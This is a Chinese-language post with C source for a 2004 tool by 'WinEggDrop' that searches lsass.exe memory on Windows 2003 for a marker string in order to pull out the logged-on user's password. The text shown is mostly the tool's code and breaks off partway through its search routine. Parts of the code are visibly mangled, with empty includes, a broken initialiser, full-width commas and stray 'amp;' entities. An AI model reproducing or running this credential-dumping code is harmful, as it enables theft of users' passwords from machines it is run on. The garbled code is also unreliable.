如何在win 2003中得到登陆密码

    下面的代码使用的是很笨，而且很原始的搜索方法，主要是搜索Lsass内存中"LocalSystem Remote Procedure"这个字符串，因为在相当多的测试中，密码都是保存在有这个字符串的地址后一点的位置中，当然了，很多系统并没有这个字符串，或者就算有，我们得到的都是错误的密码。

代码: //********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box，The Method
// Used Is Pretty Unwise，But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include
#include
#include

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address，Which Causes The Result Unreliable

char Password[MAX_PATH] = ; // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer，const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

int main()
{
DWORD PID = 0;
printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On Windows 2003 Platform\n");
return -1;
}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}

FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory amp; Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure"，
// Since The Password Is Near The Above Location，But It's Not Always True That
// We Will Find The Magic String，Or Even We Find It，The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer，const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String，Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space，But With A Ending Character，So Any Search API Like strstr() Will Fail To Locate
The Magic String，We Have To Do It Manually And Slowly
*/
if (Buffer == 'L')
{
OffSet = 0;
if (strnicmp(amp;Buffer[i + OffSet]，"LocalSystem"，strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(amp;Buffer[i + OffSet]，"Remote"，strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(amp;Buffer[i + OffSet]，"Procedure"，strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(amp;Buffer[i + OffSet]，"Call"，strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}